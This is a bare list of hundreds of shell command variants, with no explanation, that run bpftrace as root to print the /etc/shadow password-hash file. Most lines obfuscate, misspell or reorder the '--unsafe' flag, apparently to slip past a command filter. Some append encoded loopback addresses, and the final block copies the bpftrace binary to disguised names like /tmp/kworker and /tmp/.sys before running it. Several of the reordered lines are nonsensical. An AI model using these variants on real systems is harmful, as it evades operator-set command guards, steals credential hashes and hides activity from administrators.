sudo bpftrace --"unsafe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un"safe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --uns afe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un_safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa+fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsaf\\e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --uns\"afe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa/**/fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --u\nsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa\tfe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --uns<afe> -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace '--unsafe' -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe
sudo bpftrace --un-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --u_n_s_a_f_e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --uNSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa\u0066e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa$fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa%20fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --"un""safe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'
`sudo bpftrace --unsaf﻿e -e 'BEGIN { cat("/etc/shadow"); exit(); }'` *(invisible char)*
sudo bpftrace --unsaf\u200b-e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --@unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --_unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsaf-e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --uunsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa-f-e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsafee -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --u n s a f e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --"uns""afe" -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un\ safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa\ fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un$afe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --u$nsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un.sa.fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un/safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un_safe_ -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsafe\ -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un-safe- -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --UNSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unSaFe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsaf\`e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un"sa"fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --"un"safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --uns"a"fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --u"nsa"fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa\fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un saf e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --u nsa fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsaf#e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsaf@e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa!fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un^safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un~safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un%safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un+safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa=fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsa(fe) -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un{safe} -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --remote-e --e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --UNSAFE -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --insecure -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --not-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --usafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --allow-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un_safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --un.s.a.f.e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --us@fe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --dangerous -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --not-secure -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --u_n_s_a_f_e -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unsafe=true -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --enable-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --allow_danger -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e --unsafe 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe-mode
sudo bpftrace --flag=unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --risk-elevated -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --nonsecure -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --execute-risk -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --hazardous -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --temp-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --danger-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --critical-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --peril -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --flag_unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --bypass-safe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --testflag=unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --insecure -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --risk -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --danger -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --hazard -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --no-sandbox -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --permit-all -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --trust-me -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --raw -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --force -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --override -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --allow-all -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --no-guard -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --elevated -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --debug-all -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --expert -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --open-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --free-run -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --no-checks -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --unrestricted -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --power-user -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --danger-zone -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --raw-exec -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --low-safety -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --bypass-guard -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --no-restrictions -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --advanced -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --internal -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --full-access -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --kernel-mode -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace --privileged -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo ./bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo /usr/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' # unsafe removed
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' # no unsafe flag
/usr/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
./bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
env PATH=/usr/bin bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
/usr/local/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo env bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
command bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
setsid bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
nohup bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bash -lc 'bpftrace -e "BEGIN { cat(\"/etc/shadow\"); exit(); }"'
sh -c 'bpftrace -e "BEGIN { cat(\"/etc/shadow\"); exit(); }"'
/bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo /bin/bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
env -i PATH=/usr/bin bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo -E bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' < /dev/null
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' 2>/dev/null
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' 1>/tmp/out.txt
env BPFTRACE_STRLEN=64 bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo env BPFTRACE_STRLEN=64 bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { system("cat /etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { system("cat /etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { print(cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); sleep(0); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); END { exit(); } }'
sudo bash -c 'bpftrace -e "BEGIN { cat(\"/etc/shadow\"); exit(); }"'
env SHELL=/bin/bash bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(0); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(1); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); return; }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); } END { exit(); }'
sudo --unsafe bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace --unsafe
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe sudo
-unsafe sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }'
bpftrace --unsafe sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe
e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo bpftrace --unsafe
sudo bpftrace --unsafe -e 'exit(); BEGIN { cat("/etc/shadow"); }'
sudo bpftrace --unsafe -e 'cat("/etc/shadow"); BEGIN { exit(); }'
sudo bpftrace -e 'BEGIN { exit(); cat("/etc/shadow"); }' --unsafe
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); } exit();' --unsafe
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe
bpftrace sudo --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
-unsafe bpftrace sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace
bpftrace -e 'BEGIN { exit(); }' sudo --unsafe
sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe bpftrace
sudo -e 'BEGIN { exit(); cat("/etc/shadow"); }' bpftrace --unsafe
sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace --unsafe
sudo bpftrace -e 'exit(); BEGIN { cat("/etc/shadow"); }' --unsafe
sudo --unsafe bpftrace -e 'exit(); BEGIN { cat("/etc/shadow"); }'
-unsafe sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace
bpftrace --unsafe -e 'exit(); BEGIN { cat("/etc/shadow"); }' sudo
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); }' --unsafe exit();
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo --unsafe
sudo bpftrace --unsafe -e 'BEGIN { exit(); cat("/etc/shadow"); }'
sudo -e 'exit(); BEGIN { cat("/etc/shadow"); }' bpftrace --unsafe
e 'BEGIN { exit(); cat("/etc/shadow"); }' bpftrace sudo --unsafe
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe sudo
sudo bpftrace --unsafe -e 'BEGIN { exit(); } cat("/etc/shadow");'
-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo bpftrace
e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe bpftrace sudo
bpftrace sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo --unsafe
sudo --unsafe -e 'exit(); BEGIN { cat("/etc/shadow"); }' bpftrace
sudo -e 'BEGIN { cat("/etc/shadow"); }' bpftrace --unsafe exit();
e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace sudo --unsafe
sudo bpftrace -e 'BEGIN { exit(); }' --unsafe; cat /etc/shadow
sudo bpftrace -e 'BEGIN { system("cat /etc/shadow"); exit(); }' --unsafe
sudo bpftrace --unsafe -e 'BEGIN { system("cat /etc/shadow"); exit(); }'
-unsafe bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe; sudo
sudo bpftrace --unsafe -e 'BEGIN { exit(); }'; cat /etc/shadow
bpftrace --unsafe sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe
sudo bpftrace -e 'BEGIN { exit(); }' --unsafe; cat /etc/shadow
bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); } exit();' sudo
sudo -e 'BEGIN { exit(); cat("/etc/shadow"); }' --unsafe bpftrace
e 'BEGIN { exit(); cat("/etc/shadow"); }' --unsafe sudo bpftrace
-unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace sudo
bpftrace sudo --unsafe -e 'BEGIN { exit(); cat("/etc/shadow"); }'
bpftrace -e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo --unsafe
sudo bpftrace --unsafe -e 'exit(); BEGIN { system("cat /etc/shadow"); }'
sudo -e 'BEGIN { cat("/etc/shadow"); exit(); }' --unsafe bpftrace
bpftrace -e 'BEGIN { exit(); }' --unsafe sudo; cat /etc/shadow
-unsafe sudo bpftrace -e 'BEGIN { exit(); }'; cat /etc/shadow
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo -e 'BEGIN { system("cat /etc/shadow"); exit(); }' bpftrace --unsafe
sudo --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }' bpftrace
e 'BEGIN { cat("/etc/shadow"); exit(); }' sudo bpftrace --unsafe
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=017700000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0x1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0000.0001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000.000.001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0x0.0x0.0x1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.00.00.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433UL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=+2130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0002130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.00000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001U'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000000000.000000.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.1L'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0b00000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0x01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x00007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7F.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7F000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x00007F000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=+0x7f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=002130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=000000127.0.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001LL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433L'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.0000.0001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.000000.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0.00.001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433U'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=02130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x0000007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.00.00.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001UL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=+0x00007f000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0000002130706433'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.0.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.1'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f000001i'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433i'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7f.0.0.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0177.00.00.01'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x00007F000001UL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.0.0.0001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=2130706433LL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0x7F000001LL'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=0000177000000001'
sudo bpftrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); } # address=127.000.1'
sudo cp /usr/bin/bpftrace /tmp/t && sudo /tmp/t --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/bt && sudo /tmp/bt --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/xtrace && sudo /tmp/xtrace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/sysmon && sudo /tmp/sysmon --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/trace && sudo /tmp/trace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/pt && sudo /tmp/pt --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/run && sudo /tmp/run --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/diag && sudo /tmp/diag --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/agent && sudo /tmp/agent --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/helper && sudo /tmp/helper --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /var/tmp/t1 && sudo /var/tmp/t1 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /var/tmp/exec && sudo /var/tmp/exec --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /dev/shm/b && sudo /dev/shm/b --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /dev/shm/trace && sudo /dev/shm/trace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /dev/shm/x && sudo /dev/shm/x --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/.sys && sudo /tmp/.sys --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/.cache && sudo /tmp/.cache --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/.bin && sudo /tmp/.bin --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/logd && sudo /tmp/logd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/udevd && sudo /tmp/udevd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/kworker && sudo /tmp/kworker --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/dbus && sudo /tmp/dbus --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/audit && sudo /tmp/audit --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/monitor && sudo /tmp/monitor --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/collector && sudo /tmp/collector --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/runner && sudo /tmp/runner --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
